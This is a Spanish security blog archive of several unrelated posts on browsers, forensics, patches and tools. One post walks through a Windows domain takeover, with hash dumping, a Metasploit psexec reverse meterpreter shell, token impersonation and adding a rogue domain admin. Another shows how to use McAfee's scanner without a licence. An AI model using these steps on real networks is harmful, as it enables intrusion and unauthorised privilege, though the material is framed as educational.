Comodo Dragon esta basado en el navegador Chromium (igual que Google Chrome), pero ademas de las características que ya incluye Chromiun el nuevo navegador seguro de Comodo incluye las siguientes:

• Privacidad de Chromium Mejorada
• Fácil identificación del certificado SSL
• Acceso a sitios web más rápido
• Mayor estabilidad y menos consumo de memoria
• Modo Incognito (también conocido como “modo porno”) detiene las Cookies, Mejora de privacidad
• Si usas Cromium o Google Chrome es Muy fácil de cambiar de su navegador a Comodo Dragón

De momento Comodo Dragon esta disponible para Windows XP/Vista/7/Server, pero funciona adecuadamente con Wine en Mac (aun no probado en GNU Linux).

Descargar Comodo Dragon, el navegador pensado en tu seguridad.

También puede interesarte...

• Descargar Gratis Internet Explorer 8 Final
• Fallo en OpenSSL permite obtener clave privada
• Descargar e Instalar Google Chrome OS
• Google Chrome para GNU Linux y Mac OS X
• Forzando Conexiones SSL por defecto
• Actualiza tu equipo con Windows
• Sin SSL ¿Y Ahora Quien Podrá Defendernos?
• Linux Unified Kernel – Soporte para GNU Linux y Windows desde el mismo Kernel

En el siguiente video vamos a ver como  tomar el control de un dominio en windows, cuando se presenta el caso de Reutilización de contraseñas comentado anteriormente:

REQUISITOS

• Tener acceso a una maquina miembro del dominio (para sacar el hash del usuario)
• Todos los usuarios “administrador” de las maquinas miembros del dominio tienen la misma clave
• Conocer la ip desde la que se loguea el administrador del dominio (puedes conseguirla de muchas formas, una de ellas es la ing. social)
• Una copia de BackTrack 4

Teniendo los requisitos listo, pasamos a realizar los pasos para tomar el control de un dominio en Windows:

Como vemos, fácilmente hemos agregado un usuario administrador a la lista de “administradores de dominio” simplemente siguiendo estos pasos:

• mount /dev/sda1 /mnt/sda1
  Montamos la particion de la maquina windows
• cd /mnt/sda1/WINDOWS/system32/config
  accedemos a la carpeta dodne se encuentra el archivo SAM
• samdump2 system SAM
  sacamos los hash de los usuarios en la maquina windows
• msfconsole
  ejecutamos el metasploit por consola
• use windows/smb/psexec
  utilizamos el psexec
• exploit -p windows/meterpreter/reverse_tcp -o
  utilizamos la shell meterpreter
• LHOST=192.168.1.160,LPORT=6789,RHOST=192.168.1.23,SMBUser=Administrator,SMBPass= 123…:5654… -j
  configuramos las opciones del exploit
• sessions -i 1
  una vez aparezca exitoso el ataque lanzamos la sesión donde se encuentra
• use incognito
  utilizamos el modulo incognito de meterpreter
• list_tokens -u
  mostramos los tokens
• impersonate_token mydomain\\domainadmin
  tomamos las credenciales del administrador de dominio
• execute -f cmd.exe -i -t
  lanzamos la consola de windows
• net user hack MPass5678 /add /domain
  Agregamos el usuario “hack” con clave “MPass46782″ al dominio
• net group “Domain Admins” hack /add /domain
  metemos el usuario hack al grupo de administradores de dominio
• Ya hemos tomado el control del dominio de windows

Este ataque es compatible con  WinXP/Vista/Win7/Windows Server2k3/Windows Server 2k7 y muestra lo sensible que es reutilizar las contraseñas en nuestro sistema, sin importar que tan “complejas” sean.

PD. en Securitytube.net existe un vídeo en el que realizan este mismo procedimiento un poco mas “a mano” pero que puede servirnos también en nuestro proceso de aprendizaje.

También puede interesarte...

• Bypass con Metasploit: atacando a nuestro objetivo desde una maquina ya comprometida
• Katana – Múltiples Distribuciones de Seguridad en tu USB
• Como realizar un borrado seguro usando BleachBit
• Video: Explotando WM Downloader
• Como Recuperar Clave MySQL
• Vídeo: Introducción al Metasploit Framework
• Metasploit Framework 3.3.2
• Desbloquea (Jailbreak) o Actualiza el iPhone OS 3.1.2 para iPhone y iPod Touch

Sin embargo, con el pasar del tiempo, hemos visto como los virus y antivirus han proliferado en la nube, volviéndose un negocio cada día mas importante!.

Durante mi trabajo en la empresa XYZ, fueron muchos los proveedores que nos llegaron con soluciones de antivirus, algunos de ellos con muy buen éxito en mis pruebas de virus, algunos otros exageradamente caros y malos!

Bueno, dejemos a un lado el parloteo, y vayamos al asunto, la idea de esta guía, es demostrar como algunas empresas de software disfrazan las famosas actualizaciones de firmas como si fuera un texto plano que se baja a una maquina, y donde figuran las firmas de virus conocidos!. En realidad se esta bajando todo un archivo ejecutable, es decir un binario, que en su interior contiene las dichosas firmas, y que usa un frontend o interfaz gráfica para ser mas amistoso con el usuario final pero que en realidad no es necesaria y solo consume recursos innecesarios.

En mi investigación, con la ayuda y experiencia del grupo de trabajo que tuve en la empresa XYZ, pudimos observar el simple funcionamiento de los archivos contenidos en este archivo de “actualización”, donde se incluye un completo escanner antivirus por consola, con el que podremos saltarnos las pesadas interfaces gráficas de los antivirus y eliminar todas las amenazas de nuestra maquina totalmente gratis.

Recordemos que este procedimiento no es legal, es decir que no debe realizarse a menos que se tenga un contrato de soporte técnico valido y licencias de antivirus validos con McAfee.

De aquí en adelante no me hago responsable si decide hacer un acto ilegal para limpiar su equipo de virus, pues este documento pretende ser solamente académico, para que el usuario que desee aprender un poco mas del mundo de los antivirus y su funcionamiento.

El primer paso es ingresar a esta pagina:

A  continuación  debes  descargar  el  sdat###.exe  los  #  son  números  que  varían según la versión del sdat.

Descargamos este archivo.

Después  de  descargar  el  archivo,  lo  movemos  a  una  carpeta  ya  que  hay  que descomprimirlo y extrae varios archivos

Muy bien llego la hora de descomprimirlo.

En  la  consola  (ventana  negra)  ir  hasta  donde  está  el  archivo  descargado (sdat####.exe) y ejecutar:

sdat####.exe     /E

Sin las comillas

Obteniendo la siguiente lista de archivos

Después de explorar un poco las opciones del archivo scan.exe, llego a la conclusión que solo es necesario ejecutarlo con los siguientes parámetros para hacer lo mismo que su contraparte con interface gráfica, pero sin los elevados consumos y sin “problemas” de licencia:

scan.exe /ADL /ALL /ANALYZE /CLEAN /DELETE /PROGRAM /SUB /UNZIP /PANALYZE /WINMEM /RPTERR /RPTCOR /RPTALL /report=c:\scan.txt

Esto ejecuta un escaneo de todo el equipo ELIMINANDO todas las infecciones generando un reporte en “c:\scan.txt”

Conclusiones:

Las   empresas   de   antivirus  deberían  mejorar   el   sistema   de  actualización  de   las firmas de antivirus.

Las empresas deberían verificar con pruebas de desempeño sus antivirus, y dejar de   tratar   el   tema   de   seguridad   y   rendimiento   en  términos  monetarios   y   mas   en términos de beneficios para la red.

Creo firmemente que esta técnica puede ser usada con otro antivirus, ¿alguien mas se anima a probar?

Este articulo fue escrito por Eduardo Restrepo para La Comunidad DragonJAR, tú también puedes enviar tus artículos para publicarlos en la comunidad, como ya lo hicieron Axiacamus, Anaxmon, Epsilon, 4v4t4r, Cortex, Cronopio, D7n0s4ur70, Laura JAR y SamuraiBlanco; Solo tienes que enviar tu articulo a dragon(arroba)dragonjar.org.

También puede interesarte...

• Avira Premium Security Suite Gratis
• Licencia para Avira AntiVir Premium en Español Gratis
• Licencia Gratis del Panda Internet Security
• Descargar Ashampoo WinOptimizer Gratis
• Descargar Ultima Versión del Nero Gratis
• Descargar Windows 7 Release Candidate 1
• Descargar Gratis Internet Explorer 8 Final
• Los Antivirus Gratuitos Reaccionan Mas Rápido

La instalación es muy sencilla,  pueden descargar el paquete para su sistema operativo (si es GNU/Linux pueden descargar el paquete según su distribución), o si lo prefieren aquellos usuarios de debian y derivados pueden descargar la herramienta desde los repositorios:

apt-get install bleachbit

Ejecutamos nuestra aplicacion ubicada en aplicaciones-herramientas del sistema-bleachbit y veremos algo como esto:

En esta pantalla pueden escoger los datos que desean eliminar,  hay datos de muchas aplicaciones como  amsn, apt, evolution entre otros,  después de haber seleccionado las opciones,  damos click en borrar y esperamos que la herramienta haga su trabajo. En el proceso pueden salir errores, generalmente son problemas de permisos para borrar archivos, para evitar esto pueden entrar a bleachbit con permisos de root.

Por otra parte, bleachbit nos ofrece una exploración profunda, de esta forma la aplicacion escaneara todo el disco duro buscando archivos como:

• Thumbs.db
• Copias de seguridad
• archivos basura

Hay que tener en cuenta que todos los archivos que borremos podrán ser recuperados, para hacer “irrecuperables” estos archivos debemos activar la casilla de sobre escribir archivos para ocultar su contenido, ubicada en el  menú de preferencias:

Ahora si lo que deseamos es triturar o eliminar algunos archivos específicos podemos hacerlo con esta aplicacion, debemos ir a archivo y escoger la opción de triturar archivos,  posteriormente buscamos los archivos a eliminar y eso es todo.

Como pueden ver bleachbit es una herramienta  muy completa para borrar  no solamente la basura de tu sistema, sino también aquellos archivos que nadie puede ver.

Mas Información:
Pagina Oficial de BleachBit

También puede interesarte...

• Manual de TrueCrypt
• Como detectar y prevenir escalada de privilegios en GNU/Linux
• Binging – Footprinting utilizando Bing
• Katana – Múltiples Distribuciones de Seguridad en tu USB
• Instalando Varios Sistemas Operativos en un Acer One – Parte I
• Actualiza tu equipo con Windows
• ¿Como saber si tu equipo esta infectado con el Conficker?
• ¿Cómo tomar control de un Dominio en Windows?

Sin embargo WM Downloader en su versión  3.0.0.9 presenta algunos fallos de seguridad considerables, así lo demuestra DouBle Zer0 Zer0, en un vídeo donde nos  muestra como se puede explotar una vulnerabilidad de tipo “stack overflow” creando archivos m3u corruptos. A continuación el vídeo,  y el exploit lo pueden visualizar desde acá.

Mas Información:
WM Downloader (.M3U File) Local Stack Overflow POC
Pagina Oficial del WM Downloader

También puede interesarte...

• Todos los Vídeos de AntiChat – Parte I
• Todos los Vídeos de AntiChat – Parte II
• Bypass con Metasploit: atacando a nuestro objetivo desde una maquina ya comprometida
• Vulnerabilidad 0-day en todas las versiones de Windows
• Detección de WebDAV, verificación de la vulnerabilidad y explotación
• Actualiza tu equipo con Windows
• Video Tutorial de Nessus y Baseline Security Analyzer
• Hacking de Redes UPnP – Parte III

Este fallo descubierto por el investigador Tavis Ormandy (miembro del equipo de seguridad de google), se aprovecha del soporte heredado de aplicaciones de 16 bits que Windows viene heredando desde su versión “NT” y permite a un atacante obtener privilegios de SYSTEM (máximo privilegio en el sistema) en un sistema vulnerable.

Aunque todavía no existe un parche para este fallo de seguridad,  solo tendremos que deshabilitar el soporte para aplicaciones de 16 bits para proteger nuestro sistema, a continuación les dejo una serie de pasos a seguir para desactivarlo:

1. Inicio/Ejecutar gpedit.msc
2. Abrir “Configuración de equipo”/ “Plantillas administrativas”/ “Componentes de Windows”/”Compatibilidad de aplicación”
3. Y habilitar “Impedir el acceso a aplicaciones de 16 bits”

O puedes seguir los pasos de los siguientes vídeos según tu sistema operativo

Windows Server 2003:

Windows Server 2008

Para Windows XP:

Ya existe un exploit publicado para este bug que funciona correctamente incluso en Windows 7, puedes encontrar el código fuente en este enlace, o el exploit compilado aquí, por lo tanto es MAS QUE RECOMENDADO que desactives el soporte para 16 bits de tu sistema y actualices el mismo con Windows Update tan pronto salga el parche que corrija este problema.

Mas Información:
Grave vulnerabilidad en Windows permite elevar privilegios
Vulnerabilidad muy crítica en todas las versiones de Windows

También puede interesarte...

• Actualiza tu equipo con Windows
• Microsoft Publica parche que corrige Vulnerabilidad “Critica”
• Recuperar Contraseñas de Windows Vista y Anteriores
• Dentro del corazón de Windows Server 2008
• Guia de Seguridad de Windows Server 2003
• Video: Explotando WM Downloader
• Parches para Windows que corrigen Vulnerabilidades Criticas
• Denegacion de Servicio desde el WordPad

Algo que he descubierto cuando hago este tipo de migraciones, es que si a los usuarios se les deja un entorno similar al que están acostumbrados a manejar, estarán mas dispuestos a explorar el sistema nuevo y en muchos casos, ni siquiera se dan cuenta que se les cambió  (ya que encuentran el messenger y el navegador que es todo lo que usan).

Existen muchas herramientas para lograr que una distribución de GNU Linux luzca como un Windows XP, pero ninguna tan simple como la desarrollada por PhrankDaChicken y que utilizaremos en este articulo, ya que con solo unos pasos logra cumplir su cometido sin ningun problemas.

Para cambiar la apariencia de tu Distribución GNU Linux a la de un Windows XP, solo necesitas lo siguiente:

• Distribución GNU Linux con Gnome (Ubuntu, Debian, Etc…)
• El Script desarrollado por PhrankDaChicken

Ahora simplemente descargamos el script

• wget http://ubuntu.online02.com/files/XP_Gnome.tar.gz

Lo descomprimimos

• tar zxf XP_Gnome.tar.gz

Ejecutamos el script

• sh InstallXpGnome.sh

Y cuando nos aparezca las preferencias de ventana nos vamos a “local” y escogemos el tema XP.

Con estos simples pasos tendremos un entorno GNU/Linux con un aspecto de Windows XP, si les cambias el icono del Mozilla Firefox por el de Internet Explorer, el del aMSN por el de Windows Live Messenger y los dejas en el escritorio, la mayoría de personas ni siquiera notaran la diferencia (ya que no usan nada mas del sistema operativo), ademas si no te gusta el resultado obtenido, siempre puedes deshacer los cambios ejecutando el script “Restore_Settings.sh“, y volver a tu apariencia anterior.

A continuación les dejo un vídeo con el paso a paso de la instalación y restauración, para poner tu GNU Linux con apariencia de un Windows XP.

También puede interesarte...

• Como realizar un borrado seguro usando BleachBit
• Vulnerabilidad 0-day en todas las versiones de Windows
• Curso de Ubuntu
• Migrar instalación de Linux a una partición ó disco diferente
• Montar particiones Windows haciendo uso de NTFS-3G
• Manual de TrueCrypt
• Instalando Varios Sistemas Operativos en un Acer One – Parte I
• Limitar Ancho de Banda en GNU Linux

Esta basado en un modelo de cliente-servidor, con lo cual tendremos un servidor centralizado que se encarga de recibir y actuar en base a la información que reciba de los agentes que, en definitiva, son las máquinas que están siendo monitorizadas y atacadas. La forma de actuar del servidor es, por una parte, enviando notificaciones, y por otro lado, si así se configura, generando reglas firewall que se ejecutarán en los propios agentes.

Funciona en la mayoría de sistemas operativos, incluyendo Linux, OpenBSD, FreeBSD, MacOS, Solaris y Windows, ademas acaba de salir la nueva version 2.3 de este proyecto, la cual incluye:

1. Registro de las reglas de análisis para el servidor web nginx
2. Registro de las normas de análisis de suhosin (Hardened PHP)
3. Soporte para la vigilancia de integridad de archivos en tiempo real en los sistemas Windows
4. Soporte para el control de la salida de los comandos (control de proceso)
5. Y mucho más (para ver la lista entera de cambios, click aqui)…

Descargar OSSEC 2.3

Mas Información:
Pagina Oficial del OSSEC

También puede interesarte...

• Gestionando las impresiones en MAC, Windows y GNU Linux
• Como quemar un archivo DMG en Windows y GNU Linux
• Desbloquea (Jailbreak) o Actualiza el iPhone OS 3.1.2 para iPhone y iPod Touch
• Aircrack NG v1.0 Final
• Desbloquea (Jailbreak) o Actualiza el iPhone OS 3.0 para iPhone y iPod Touch
• Manual de TrueCrypt
• Instalando Varios Sistemas Operativos en un Acer One – Parte I
• Adeona – Rastrea tu Portatil Robado

Indice

1. Introducción
2. Obteniendo datos volátiles
3. Obteniendo datos no volátiles
4. Clonando el disco
5. Referencias

1.- Introducción

Tradicionalmente los forenses vienen dividiendo los datos en 2 tipos:

• Datos volátiles.
• Datos no volátiles.

Los datos volátiles son aquellos que al apagar la maquina a analizar se pierden. Esto no es del todo exacto, pues tal y como debatimos aqui es posible recuperar datos almacenados en RAM _tras apagar_ el equipo.

Los datos no volatiles por el contrario son aquellos que permanecen en el disco duro tras apagar la maquina.

Tipicamente, un forense adquiriria una imagen del disco mediante herramientas tipo dd o cualquiera de sus evoluciones (podemos ver mas del Análisis de memoria RAM. Recogida de evidencias en este post). Nunca con herramientas tipo Ghost, pues perderiamos la información a mas bajo nivel como en que clusters o sectores estaba almacenada la informacion, espacio particionado y libre (unallocated), espacio slack o espacio sin particionar.

Y como una imagen vale mas que mil palabras, como dice el refran, a continuacion muestro una imagen donde se ve mas claro lo que son estos conceptos:

Sobre el espacio slack me gustaría hacer un inciso, enlazando un vídeo algo viejo pero interesante titulado Look for deleted data on the slack space of a disk.

También comentar la existencia de la genial utilidad slacker, sobre la que hablamos, quizas muy por encima para lo que se merece, en un hilo llamado Anti-Forensics.

Así que los que queráis iniciaros en el uso de dicha herramienta, podéis consultar un paper bautizado con el atrayente titulo de catch me, if you can… presentado en la Blackhat 2005 por James Foster y el crack Vinnie Liu, que no se si a dia de hoy sigue implicado en el Proyecto Metasploit.

Y por ultimo, para los que querais profundizar sobre sistemas de archivos a bajo nivel, os recomiendo el _excelente_ libro File System Forensic Analysis, de Brian Carrier; ademas de los talleres de Vic_Thor sobre FATxx y NTFS.

“Cualquier contacto, deja un trazo”
Locard’s Exchange Principle

Continuar el post en Recogiendo datos para Análisis Forense de sistemas Windows >>

También puede interesarte...

• Análisis forense de memoria RAM en entornos Windows
• Webcast de Microsoft sobre Seguridad Informática
• Vulnerabilidad 0-day en todas las versiones de Windows
• Herramienta Anti Forense para Windows
• CAINE – Distribución Live CD para Análisis Forense
• Instalación, Configuración y Uso del Microsoft Cofee
• Parches para Windows que corrigen Vulnerabilidades Criticas
• Como quemar un archivo DMG en Windows y GNU Linux

Los fallos son bastante graves permitiendo a un atacante la ejecución de código remoto o realizar un ataque de denegación de servicios en el pc que corra una de las aplicaciones vulnerables, les dejo un listado con los fallos de seguridad y el software afectado para que puedan determinar si tienen software vulnerable e instalen los parches:

• Boletin de Seguridad MS09-063 – Critico
  Vulnerability in Web Services on Devices API Could Allow Remote Code Execution (973565)
• Boletin de Seguridad MS09-064 – Critico
  Vulnerability in License Logging Server Could Allow Remote Code Execution (974783)
• Boletin de Seguridad MS09-065 – Critico
  Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (969947)
• Boletin de Seguridad MS09-066 – Importante
  Vulnerability in Active Directory Could Allow Denial of Service (973309)
• Boletin de Seguridad MS09-067 – Importante
  Vulnerabilities in Microsoft Office Excel Could Allow Remote Code Execution (972652)
• Boletin de Seguridad MS09-068 – Importante
  Vulnerability in Microsoft Office Word Could Allow Remote Code Execution (976307)

Es muy recomendable que actualices tu sistema operativo y tu suite ofimática para evitar la oleada de gusanos y malware que no demoran en explotar estos fallos para propagarse por toda la red.

Actualizar tu Windows desde la pagina de Microsoft Windows Update

Fuente:
Microsoft Security Bulletin

También puede interesarte...

• Microsoft Publica parche que corrige Vulnerabilidad “Critica”
• Vulnerabilidad 0-day en todas las versiones de Windows
• Denegacion de Servicio desde el WordPad
• Detección de WebDAV, verificación de la vulnerabilidad y explotación
• Actualiza tu equipo con Windows
• Video Tutorial de Nessus y Baseline Security Analyzer
• La Mejor Defensa es la Información
• Microsoft publica 8 Nuevas Actualizaciones de seguridad